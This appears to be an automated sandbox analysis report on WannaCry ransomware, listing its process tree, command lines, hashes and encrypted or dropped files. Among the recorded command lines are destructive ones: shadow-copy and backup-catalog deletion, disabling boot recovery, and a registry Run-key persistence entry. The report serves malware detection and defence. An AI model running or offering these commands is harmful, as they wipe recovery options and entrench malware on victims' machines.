capacity for this level. 7 dropped files have been hidden. d1e545486 libeay32.dll, PE32 d1e545495 libevent-2-0-5.dll, PE32 d1e545504 libevent_core-2-0-5.dll, PE32 0->3860sig 0->d1e544783 0->d1e478394 3 tasksche.exe 3 0->3      started     2->3862sig 2->d1e478453 4->8094reducedSig 4->8094sig 5 tasksche.exe 1 1011 4->5      started     3->d1e76155 dropped 5->725reducedSig 5->725sig 5->915sig 5->5235sig 5->d1e175133reduced dropped 5->d1e175133 dropped 5->d1e175159 dropped 6reduced Processes exeeded maximum capacity for this level. 6 processes have been hidden. 5->6reduced      started     11 cmd.exe 5->11      started     14 @WanaDecryptor@.exe 5->14      started     15 cmd.exe 5->15      started     21 taskse.exe 5->21      started     22 cmd.exe 5->22      started     11->80911reducedSig 11->80911sig 13 cscript.exe 11->13      started     14->7214reducedSig 14->7214sig 14->d1e545486reduced dropped 14->d1e545486 dropped 14->d1e545495 dropped 14->d1e545504 dropped 19 taskhsvc.exe 14->19      started     15->80915reducedSig 15->80915sig 18 @WanaDecryptor@.exe 15->18      started     25 @WanaDecryptor@.exe 21->25      started     22->80922reducedSig 22->80922sig 26 reg.exe 22->26      started     19->77719sig 19->d1e544777reduced 19->d1e544778 19->d1e544780 19->d1e544784 18->7218reducedSig 18->7218sig 27 cmd.exe 18->27      started     25->7225reducedSig 25->7225sig 27->80927reducedSig 27->80927sig 27->53227sig 27->86427sig 29reduced Processes exeeded maximum capacity for this level. 2 processes have been hidden. 27->29reduced      started     29 vssadmin.exe 27->29      started     32 WMIC.exe 27->32      started     33 bcdedit.exe 27->33      started     process0 dnsIp0 signatures0 process3 fileCreated3 signatures3 process6 fileCreated6 signatures6 process13 dnsIp13 signatures13 process27 signatures27 process29 fileCreated0 fileCreated13

Yara Overview

No Yara matches

Screenshot

windows-stand

Startup

  • system is w7_1
  • mssecsvc.exe (PID: 3048 cmdline: 'C:\mssecsvc.exe' MD5: DB349B97C37D22F5EA1D1841E3C89EB4)
    • tasksche.exe (PID: 3216 cmdline: C:\WINDOWS\tasksche.exe /i MD5: 84C82835A5D21BBCF75A61706D8AB549)
  • mssecsvc.exe (PID: 3164 cmdline: C:\mssecsvc.exe -m security MD5: DB349B97C37D22F5EA1D1841E3C89EB4)
  • cmd.exe (PID: 3232 cmdline: cmd.exe /c 'C:\ProgramData\ywepvofkuzu108\tasksche.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
    • tasksche.exe (PID: 3240 cmdline: C:\ProgramData\ywepvofkuzu108\tasksche.exe MD5: 84C82835A5D21BBCF75A61706D8AB549)
      • attrib.exe (PID: 3248 cmdline: attrib +h . MD5: 459A5755AFBB1CB3E67CA4C1296599E3)
      • icacls.exe (PID: 3256 cmdline: icacls . /grant Everyone:F /T /C /Q MD5: 1542A92D5C6F7E1E80613F3466C9CE7F)
      • taskdl.exe (PID: 3320 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
      • cmd.exe (PID: 3336 cmdline: C:\Windows\system32\cmd.exe /c 239891494608079.bat MD5: AD7B9C14083B52BC532FBA5948342B98)
        • cscript.exe (PID: 3356 cmdline: cscript.exe //nologo m.vbs MD5: A3A35EE79C64A640152B3113E6E254E2)
      • @WanaDecryptor@.exe (PID: 3408 cmdline: @WanaDecryptor@.exe co MD5: 7BF2B57F2A205768755C07F238FB32CC)
        • taskhsvc.exe (PID: 3500 cmdline: TaskData\Tor\taskhsvc.exe MD5: FE7EB54691AD6E6AF77F8A9A0B6DE26D)
      • cmd.exe (PID: 3416 cmdline: cmd.exe /c start /b @WanaDecryptor@.exe vs MD5: AD7B9C14083B52BC532FBA5948342B98)
        • @WanaDecryptor@.exe (PID: 3456 cmdline: @WanaDecryptor@.exe vs MD5: 7BF2B57F2A205768755C07F238FB32CC)
          • cmd.exe (PID: 3628 cmdline: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet MD5: AD7B9C14083B52BC532FBA5948342B98)
            • vssadmin.exe (PID: 3660 cmdline: vssadmin delete shadows /all /quiet MD5: 6E248A3D528EDE43994457CF417BD665)
            • WMIC.exe (PID: 3776 cmdline: wmic shadowcopy delete MD5: A03CF3838775E0801A0894C8BACD2E56)
            • bcdedit.exe (PID: 3804 cmdline: bcdedit /set {default} bootstatuspolicy ignoreallfailures MD5: ABD373E82F6240031C1E631AA20711C7)
            • bcdedit.exe (PID: 3812 cmdline: bcdedit /set {default} recoveryenabled no MD5: ABD373E82F6240031C1E631AA20711C7)
            • wbadmin.exe (PID: 3824 cmdline: wbadmin delete catalog -quiet MD5: EAB630E7E6A7FC248870A2FCDC098B98)
      • taskse.exe (PID: 3516 cmdline: taskse.exe C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe MD5: 8495400F199AC77853C53B5A3F278F3E)
        • @WanaDecryptor@.exe (PID: 3568 cmdline: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
      • cmd.exe (PID: 3528 cmdline: cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 'ywepvofkuzu108' /t REG_SZ /d '\'C:\ProgramData\ywepvofkuzu108\tasksche.exe\'' /f MD5: AD7B9C14083B52BC532FBA5948342B98)
        • reg.exe (PID: 3584 cmdline: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 'ywepvofkuzu108' /t REG_SZ /d '\'C:\ProgramData\ywepvofkuzu108\tasksche.exe\'' /f MD5: D69A9ABBB0D795F21995C2F48C1EB560)
      • taskdl.exe (PID: 3548 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
      • taskdl.exe (PID: 3900 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
      • taskse.exe (PID: 3908 cmdline: taskse.exe C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe MD5: 8495400F199AC77853C53B5A3F278F3E)
  • wbengine.exe (PID: 3872 cmdline: C:\Windows\system32\wbengine.exe MD5: 691E3285E53DCA558E1A84667F13E15A)
  • vdsldr.exe (PID: 3928 cmdline: C:\Windows\System32\vdsldr.exe -Embedding MD5: A2551668C78CEA4089D71A0A3B36FC0C)
  • cleanup

Created / dropped Files

File PathType and HashesMalicious
C:\@Please_Read_Me@.txt
  • Type: data
  • MD5: 7A2726BB6E6A79FB1D092B7F2B688AF0
  • SHA: B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
  • SHA-256: 840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
  • SHA-512: 4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
false
C:\@WanaDecryptor@.exe
  • Type: PE32 executable (GUI) Intel 80386, for MS Windows
  • MD5: 7BF2B57F2A205768755C07F238FB32CC
  • SHA: 45356A9DD616ED7161A3B9192E2F318D0AB5AD10
  • SHA-256: B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
  • SHA-512: 91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
true
C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png.WNCRYT
  • Type: data
  • MD5: 681CF249C4AAB2E272F07F1E5D6175D5
  • SHA: 55D00B3BFC257A909D3C9E931747C6869066B684
  • SHA-256: D6A5A2C321539F59BF360CD2392C706298509F31A4058B2BA2E8F40873861B7A
  • SHA-512: 139C1AB7E6A59D340881A8BA3F29A22F101BAAFD23DB23982E61AB6BA52E956254906C8AC5557D6E16E762C24F86E9361142C0C04E035CFD272475A84DB902D5
false
C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png.WNCRYT
  • Type: data
  • MD5: E9F31A2B574D01919B43874072F0A0E4
  • SHA: 5A577FC7C98433E111B94135A90471263A3F5A98
  • SHA-256: 1043C9C4F3F952E55E60A061AE1A4C989D6D24F20E6A83A0B20B616D82B5E96B
  • SHA-512: 5EE7E8F1E9C393FF8B18FC7F7B4675839AC4A6DA9D541B310938FC515C6C8DB21940123962354CE7659B1A18E39674E2467F7CB17C5E20EC1D68550C3DEA60A8
false
C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png.WNCRYT
  • Type: data
  • MD5: 356731814B776E8BE9CF46C104C6D35D
  • SHA: 4DF9E50D5C3C4643B36CDACFC8D5A41DA006E856
  • SHA-256: 98A74A8551E3D3B08096674AFBD7FACDC56AE9487A2449AE3C1002D5E867ADB1
  • SHA-512: 68BFC85A107EC57381A09FA5A74F49154B5CA292AC91FC4B2FFD7CB18396C92D6932E6ADAD407B37222AE9282BF688BE2D0CA6EF777AF772FDD66CE730D0F6D2
false
C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png.WNCRYT
  • Type: data
  • MD5: 268C8A69A85A0D0A9AE463041047AA73
  • SHA: 0399744AC5A7CA3EADB2227F3AFEAB257C399344
  • SHA-256: E2AA84E82E7E6B3E283AFDF2CA8070CED8D372C5CE2EDEB4D1D7099DEA00620E
  • SHA-512: 0AB161A8BBD2AEB7E3C6D5D4146388B33E5D8DD054DC6E7FFDE3938A2D93F3814444A224F9A5C67DB434B92EE239D2BFE071A67CF193853CD12C17A34EEE469E
false
C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png.WNCRYT
  • Type: data
  • MD5: B348A334A83D024B5FFFAB70A2C56F7D
  • SHA: 9ED1ABE0FFFBB36341564CE2A8552F99128B413F
  • SHA-256: B17934683265957A9C1F5BC06EA0B0506B4811051F250D19A5903F0A9042A1F1
  • SHA-512: B8DEAF148CBFD5965AFCE3EF7DCB870723A7BEE9BCB4556852B0C40443ED61DBF5EE68BFA4F9EB645CC95145E9B325FCD684C2B3A8147602E45E42C0F96E0F33
false
C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png.WNCRYT
  • Type: data
  • MD5: C7E69524D84F0DAF66E47144C53A9A01
  • SHA: 85AB518090FF1641C52F991D140B20DD033F8610
  • SHA-256: 2300A50AE12E38BA9B728BE168E53A31C3951A308514BE3603AA528D63DD8029
  • SHA-512: 80087DCAEC650B761112620BAB0EE151A559232916AD8A7C302985E48A1073D08C8AB8FE66DE349219566678BE20B89CAB3AD3C75DB3C2CAB1A2A7CC313067B9
false
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb.WNCRYT
  • Type: data
  • MD5: 6DB5F914628913C728C199AE05624C70
  • SHA: 06AB6790CD45AD185F361AD2AC0155A2EE796FD1
  • SHA-256: E4C95E25110BEAF1D95A0825C8A64A3DECE0B246D876DDFCB69E3FC8E1AEB15F
  • SHA-512: 955FB4233D4B1FFBAFB19579E37574BEBE69942FE760F9A6FE4E48023D878887B4A00739C220D969A66328E9822C8480F5DDBFE2404BA400267E1A39464284CF
false
C:\ProgramData\Microsoft\User Account Pictures\@Please_Read_Me@.txt
  • Type: data
  • MD5: 7A2726BB6E6A79FB1D092B7F2B688AF0
  • SHA: B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
  • SHA-256: 840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
  • SHA-512: 4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\@Please_Read_Me@.txt
  • Type: data
  • MD5: 7A2726BB6E6A79FB1D092B7F2B688AF0
  • SHA: B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
  • SHA-256: 840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
  • SHA-512: 4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile10.bmp.WNCRYT
  • Type: data
  • MD5: 7BBD581268CA3E3B6D728FF2B03FA5A6
  • SHA: 3D84C44E0FB4AFCFA6D377C430A9997FD30004C1
  • SHA-256: 56D8E2D08252D28F631AF39CA946C71B886F49C8DE37BA77F6B6677E9D339E2E
  • SHA-512: 3350BF2B469AAEF434971409B3528E3105FCEFF65F75B0311AEA03A85937E45EF5C1776E21F7B4CF8DA5062D4FA680DB98FC9B6187D3F19C3FF41BAD7344043C
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile11.bmp.WNCRYT
  • Type: data
  • MD5: E6D45B60B3E70F35C95DA7981A09B73C
  • SHA: BA24D38DDF18B70CDD3F2F817B6DD79AC817A5E2
  • SHA-256: A0BC9FC4C9DF88B455F46E5129D93CF6F22E8BBF6B13A72B8E23911C678ACE85
  • SHA-512: BBBDA5EF4E3C281EFEF04D356B9FEBF6BC6E795AF96066086D4907F70DB2A7EF91D62D653C465CEB97AE1B1BDA91C8C076956492208B8259BEB843318498983E
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile12.bmp.WNCRYT
  • Type: data
  • MD5: 92E0CCDECBC8C8D6D2FC99C8DCB8FAC7
  • SHA: B773BF278D9EE0C7F64FBBECFD537E9703AE3C43
  • SHA-256: 107132E1EAFAFAE5C82976191D403B74129FB8734E51B3CAA41DAFEE1A5D07FA
  • SHA-512: 26D75009CD8913E3CE38A5D89125A977C4A4F7512FE5C39854093CD3EBF0E65C0C5B74A58EA39F7D7280F8CDF52E12ABDBA9471156EC4F39BB5DA404E958292C
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile13.bmp.WNCRYT
  • Type: data
  • MD5: 999B7B2EE515A266BBDC67894E8DB30E
  • SHA: 164CAE418C9B52FC306BC59DDBBC99800160F0AD
  • SHA-256: 288134C094C1164996FF6A113D166453D33AE4583B38D4BD58F333F5DC30261A
  • SHA-512: B5CCC1E56B120EDF07430225220D3322B5E9E679394D17D31C4ACE6BC590FAD2C1DD68566A5FC92B56E0DDB96AAC4115A2F004B06E0B3E5CB0BD45C09E9C8C42
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile14.bmp.WNCRYT
  • Type: data
  • MD5: 9D71F0B502BB930947EABFA2B239BC81
  • SHA: 445DBE7528F21CE354808BE38CC2F771032C39AF
  • SHA-256: 485B4B93B86FA09D4BAF4F9D492C9A0D637A516F61E308491B58117BA65E0C98
  • SHA-512: FA38709CE3C238E5ADCF702C545E24ED6448833D8C68E847D1EBDD4472AD031E62B6C99B84A0161EEE0F3938D1377C7F28E72A7F5B9347CD0E7F0ED4C7AB0EFD
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile15.bmp.WNCRYT
  • Type: data
  • MD5: DB99F96438FDBE34FDBFFFF55E714A79
  • SHA: 7B4D269736265BBD9258335B2FDDFCB9ED5EDD73
  • SHA-256: 29460CA877FD1D3C103720BD7411A165E7D3737548EDC27659DD465B25B4437F
  • SHA-512: 94EC5E8AA9433FC86B058FC4E6A56CE3657ED3C9B09096D0A1D2B2BFA6DA3964A1795F446FDF40491E82BED0D6D7BD9D5F0536D5E2FDBE14E2E285E0C8BE3599
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile16.bmp.WNCRYT
  • Type: data
  • MD5: 853B65AD2065A03B5421540F91303B2E
  • SHA: EB345346FD98C36F43FD4180C8B694C7EEC05154
  • SHA-256: B2049153ADDBF85496F461A6185AD8A5C7012D5471F624062C7A1882DECB3F7D
  • SHA-512: 4D53F87CFA2A857C982939DF1CC558FA08D085E03A8C57539D5C8C6AF3533622D5E7B142AFEBBA484DA64A17A8083890EE34A93777B2B341973C772EAC3760FE
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile17.bmp.WNCRYT
  • Type: data
  • MD5: C5D167BBEFABD0993A7840BDB9A4DF4B
  • SHA: C03872DECB9E86ACE4212AFA7A04186667D9B14C
  • SHA-256: 37B88A354FA5520060AD4CA26CF49E6448814144389DD943827C739367ECF1D1
  • SHA-512: 9067BA1448F8B12924B1638D5A2BB62A67A3A29B7E99AFCECC545A23CAB73491D080AB49CA30A77CCE7D3D21F2B4467CB5B3DFE9A3AB624B05E80DDE23C1496C
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile18.bmp.WNCRYT
  • Type: data
  • MD5: AA2E504AC4257E6442D59E9C10F8C361
  • SHA: FD7C8BCE60C0903B4BBE85FB0EA815276CB1B7B6
  • SHA-256: 63886B8569F52F3794C7FCF8829435E62BFC68665ECF3B7C0AC54CBBBDAD356E
  • SHA-512: 99DA901D9B5A96E0CABAA2942A2DAB08ED2F067C4B5D3478D3315AD0DC7241D2CB2F9421D5A74DAD7A180A19BCEAEA149C31B397A7B6EF11077FA5B2AE14E7C6
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile19.bmp.WNCRYT
  • Type: data
  • MD5: FD35CE06A08B7AFB9B73E9032388A693
  • SHA: 9E07137ED07E13EC674D62D57C61F080CEF8276C
  • SHA-256: 1B10363C343E90F3E4581498909499B82066C6C454D90D29D3A46ADA5EBE6754
  • SHA-512: 21092A38EC0BE76E706A5FF05435DC76360B1D2585C7812B9D98A8A70A1800AADB365D75A3331811D14312E34C99336B5E5FD77E0F8F41B6D99C5CB6C7F3A14D
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile20.bmp.WNCRYT
  • Type: data
  • MD5: C969DE554BFA510133E1AB051BE659D9
  • SHA: 43C55E72FD18E1B51D89275C74F49C5180EE94A8
  • SHA-256: 554375DA2EB7EA214B07E16AB8C746F9001676CAE4457028FD989C991C027960
  • SHA-512: B6CFCA8AC18737A75AB049E10DEE1E2A90DFA914C6A4906C1AEEAF0DEB2805E0EE843D9A2572F5D27033FDF15E80414B4B9341017FA1D4822C83CDCEF746DED4
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile21.bmp.WNCRYT
  • Type: data
  • MD5: 7A3A5B1DF022B3835F73A43EC64D844E
  • SHA: 67BCDE7836298449FC7DF1385289D8CF4BEB9055
  • SHA-256: E67B40F874F8FD258D5AED6F6D42D09A0C43A409D6ECA3829435678DE51C85BB
  • SHA-512: 6083C0B02E9B13F2AD82F98E84E1173C1697D0D8377699C1753B464388B9D302D68998B924A181C34A5A2F6343ABFAF86EFE6840732EAAC3B5F8400BF99A62F5
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile22.bmp.WNCRYT
  • Type: data
  • MD5: A29B603C2313E7BD32B93BE989A462FE
  • SHA: C6FDBA4DE388A8A10CC4DDE2D1967CB6D3768CBA
  • SHA-256: 7A2B44FC04E36A732574D0A931F85593EC535890C22C5B39F907592F20992454
  • SHA-512: 2B43A411B6105B5529F658A01D21D34831F8F8545A0559CFF6706CEF744D64F5E7C4C17B5360556957BEAA3841B13B2E09CCE9D4B6C2667ABF4FFC8CB76CA5EA
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile23.bmp.WNCRYT
  • Type: data
  • MD5: F8D4052AA4844CF09FB9787A3733D850
  • SHA: C6C5BC31A4D5F66B26A69251A869E0DC758221F7
  • SHA-256: 71C210394AE4FEF6B5D4F415049A86DF1C37394FFDD749207CA99753D5AA5FB0
  • SHA-512: 8EA640B62A8055193C51EA1C0084E89E301E63701B4773E7EFE04290757DE0068BFB515F2CABF36894C9D41B55439E113A9085053F32949E5AB17E9E4558EC66
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile24.bmp.WNCRYT
  • Type: data
  • MD5: BA69E90E4B24C0E0FD4354ACB2E485C3
  • SHA: 673B17285DB393CDF80B1074131BABA610302FF0
  • SHA-256: 33FCEB1CEBA3A6590B98C48205C67C9F24E0AB2E7B87D6F94126FAE678FCC519
  • SHA-512: B0F9948C347D4D6DE9547B7202B0328BBE00CDBF9A2DD176D9F3D7A1183BA5DF38A88CE9D8F330EDCAFE1D71742849DC224E07199263A8E255FA4C3FD750D3FD
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile25.bmp.WNCRYT
  • Type: data
  • MD5: 20731E84FC5BFA4C6BD4FB5DE0228CFA
  • SHA: 767D9D1994712CCC525124C3B0A40E4A622C6955
  • SHA-256: 043CD63BDE5FE1E1ECE289AE152CE93A3F650C9B27067AA76677D22EB450F7F0
  • SHA-512: 88ADFCABC84E6316128CF8DA87DE01285198FD7ED683EF2C56170E1FE5828F83E6530A74F9216E69056A125AF7183F122EF26EF1A12C85ACB81FE38E615D44C1
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile26.bmp.WNCRYT
  • Type: data
  • MD5: AAFD141725EB97477640CF4F7A78300B
  • SHA: C66E70362C4C369F3572443929EF5202CCE6B3D8
  • SHA-256: 6B39F3986E5FD768AC8FAD58875838B03212D0F86B2F3783EC501BCA9E1A9C11
  • SHA-512: 3A7BEDF23E2B969D40171D0FDA396824D7336E380EC05358734D50D73148D89490333644D249994E1335FD601666C3BFBAFE653406B8077BB7D8C69215AF3BBB
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile27.bmp.WNCRYT
  • Type: data
  • MD5: 2BB68F651AD52EA8155E41B9B9129DFF
  • SHA: E60B9E5F8D0F1E0DAA9C0F3555353077CA88A38E
  • SHA-256: D1BBE724C1AD7FF9C03DE8E82E758585A7ED1BFE819405A1D417277965927BAB
  • SHA-512: 581C6EAFC4DE01D53ADA839CD14C81081CA45668357FB87FC98F2593752763A96F2ED0158EB347B6777EBBC806400707178F881AF4A1434B07BE176B16750BBF
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile28.bmp.WNCRYT
  • Type: data
  • MD5: BB7C63F815CA5C4C969F2E5BB12F8B9F
  • SHA: F10E67B040CC844FBFB48D5FDD9A52B3A7661FCF
  • SHA-256: AE1A21DC3FE9E89FA7A439F036FE985A6F74310A03180468A82A1A68E157BB7D
  • SHA-512: 49CB0530419C07339CB7E7BE52F31F61AA43F6B563D518B588AF1E8C1D2FEE454C45E00D39F8D80C39EA89F75C3A13E625F3B8B8A645097FDD5B32FD1B764E82
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile29.bmp.WNCRYT
  • Type: data
  • MD5: B015E818176C53488E60B3A82C6226C1
  • SHA: 2E3A3814D8A66F3709DC52C4E5A4B68452005CB2
  • SHA-256: 31D2EFC885DB1AD5F1168A0386C7A1C518F4A662E929E43235404408A587A7DF
  • SHA-512: DF7AF8B2B5607D2513D7DC635F195B0C1860B5647985D66C1AFFBABA3B937B0BFA17A90F981F55BF4110FC1C66C0C723D19A41C76B9593CB66944EDBD3103D7D
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile30.bmp.WNCRYT
  • Type: data
  • MD5: 5B66053B6DDAACBAA4F2D8E21B2FCF0B
  • SHA: 56831DDD6D97633D90A1C683FB5CB48906400BCF
  • SHA-256: 28367BC02BD33AD822E6D8013EE4E52A6E7CDBE5D0EFFDE94A961F1B4A9CB67B
  • SHA-512: DB63B2CF1E1AAB509117B068D65ED463A937D47426C75080AD24636E142987B706E4E53D8A40FD0DF6BEDBEDAD173DE2A3F11D343AE87E29667BDEBB8C124A32
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile31.bmp.WNCRYT
  • Type: data
  • MD5: 984D714A03E0C82A4B51CDC685AC99E3
  • SHA: 367C46C92DE23F7EE8983030D6E7DFCA2FF679F4
  • SHA-256: 88D4621B4A2ABD6A62D63DCB3E215A2C51C4D6BE2BA0E50D1DE7EE138A31E200
  • SHA-512: EDA850C946EDF1DFE750F776D6817FD2C063D6E9CAEDD3C3F4BEAC814B677307193AC5FF939F98FB5735909643E2047966CD8E9EA6A18D78E8BC1E5F8E32BC8D
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile32.bmp.WNCRYT
  • Type: data
  • MD5: D15DCBDDA08FF59C1B3AFDED9BA47FF9
  • SHA: 25BD2C5DC9807F3124057FFFDD055B8EF4DCD1F7
  • SHA-256: F06FBAD186FC29963F708AD8FE8B7ED8C32AF77D29BF1F5AF76423BB56A30BC8
  • SHA-512: 3F3EBFA364E1425FA82A23F2DAC8307E0FD53614EB6BA1FF4EC311AAB6BAEFB3C75010622331DE75C8B7D30E703732CE5D1E0B5B0E36C16F837CEF3FA4FFABDB
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile33.bmp.WNCRYT
  • Type: data
  • MD5: 79C4774CF7FC5230C541BE118872B08E
  • SHA: CFCFAA62ECA5A9BD30F8E65D9501459B8C7732B5
  • SHA-256: 60BC5CF61D8523BB2CE38AA95A7A90166EBCB80FA06AF38A1852003AFE493A76
  • SHA-512: 42B719259FB54FFC070F1EF40099E0D74D5DE477E4B33ED11D6F7F5FB45353BD8B8E73BF9D87B009F2980FB52E731D7743C2CAA86AD5A671DBCCF5A342DB9B72
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile34.bmp.WNCRYT
  • Type: data
  • MD5: ED3541F36B532DAA524EA7D9D4E0E990
  • SHA: B2D1B6C681DF0D7DED1355E1FC575CCF0F81169E
  • SHA-256: 3F51299CF06D0860F71734004666595C97F0A17D27B6E2F5044C1286CD4D7B9A
  • SHA-512: FDC39C51941CE41D00ADC32EB7B07801327E83DED10AC2B7D6D0138569898FD9D0DD2E6C0E1BD122D7108161ACD509CDFFB70F1028E8FF1C8FB0AEA1FCA02C8C
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile35.bmp.WNCRYT
  • Type: data
  • MD5: BF8B6B3B28C5A9888441CDB59F6AE74B
  • SHA: 6A7B68D2C95D0425AD82CC88F054A98E3AC0A362
  • SHA-256: E9E4924EC9B107164BA763A95ADED74A55A48F2327CC97EA8DE352137DC5E8C1
  • SHA-512: F38613B8651909EE9D06A3F35ABA6A2E52A6A13163DD02B0CDA9277CF5E771FCAB084A62A64F52DD39B223EB13615DFF4D64A65CC518707D6BF69515659A95EE
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile36.bmp.WNCRYT
  • Type: data
  • MD5: B46B80B22A4B1F3FCA29DD40D05A794C
  • SHA: 740BC26BC2620BD02EFB79542123DE6DC7BB45AE
  • SHA-256: AFD136E18B6ADEDA710928C82262F1D3DC2DC9302FD88239992A67134A1BD81C
  • SHA-512: 1073B1CD1546D1115281F6FA9E6F38BF2BD42B67483EC4E3B8BC048DEF748FFFDDC0D6F9C15B7CB31FFBAFB56433DD669E57BF4B5682BD0E2578F443AE701CC0
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile37.bmp.WNCRYT
  • Type: data
  • MD5: ADC9B78A2C057DB8CCB401A242C53D84
  • SHA: 4F6641EAD6FB9C35AEFD58379DFB0687992DE4E2
  • SHA-256: 0968A7AA411E722F93A6C302163BF7A5F460ED6E6B3A084B6DE4109DB14C6DDE
  • SHA-512: 1A87529E246B350C59E3B6CCA57A09F54310FB3231BF3E3B7B74FB5CC7143D8F977CC8304A69C4B69EF6BE9AD6F6BB119A770EB2B20146FCA768425979EB1016
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile38.bmp.WNCRYT
  • Type: data
  • MD5: 6851E4F4DCC7827A74882E9F5D46B9C0
  • SHA: 468A3B85B5B7B48E337F937BB89AD2FB5E389DA9
  • SHA-256: 529CAE5D35FE9BD676639F0B5F5F09264093BBFCE5E664B992299C023895ED91
  • SHA-512: 0151282392635EEE744B3622529EBE5573ED1BC3728988351A9926BBAD8DDDAA7C1C6289434C7F053107847B5DFBD5C0C72593A6522D72063B61E812B4A66E99
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile39.bmp.WNCRYT
  • Type: data
  • MD5: EC3AD85E43FDFD206DBA97AADEC421F3
  • SHA: B2C909ED9A150964D8AE46ADA889F205CB908CE4
  • SHA-256: 9617F1AC9A066EA7E30212097CDBA3B7B88159BF28E795B70884A8D3BD678DCF
  • SHA-512: 30F3496659642F5947E2C0D40EDE3229CE54060CDBC8125B6DE4D038DBD1C3EB570CE7ADE1C847E2B0B4A7215D6DD93B9E8B4DC5B10AE832865A2C61EDB01AF1
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile40.bmp.WNCRYT
  • Type: data
  • MD5: 3EDC0173127667C8DD9E302BFD08CE65
  • SHA: FB806AF7768079C9D79B743A036F4DD26684F04C
  • SHA-256: 4B5C01D3C3D0E7D5B70C522FC04B499194E6237E11E031215C375AB232423A34
  • SHA-512: 6BB27625AFEED4BB149CE778706ABDBC8F4352F93E82B9647BA3F0C03EE9ED9F7BFEC9033049847C85ACF2579A5A953FEB52F4450C5FB26EFA7864BABC686684
false
C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile41.bmp.WNCRYT
  • Type: data
  • MD5: 106603234B94DC5F797037F0B9B0664A
  • SHA: E89BEBC6ED78208D5263BDABFFBFC49D9F68A34D
  • SHA-256: C3E0B3E04BC41ECA0E64D4513FC6CA218A8B6A38BDF1B6A7CBB5023B2A4537CD
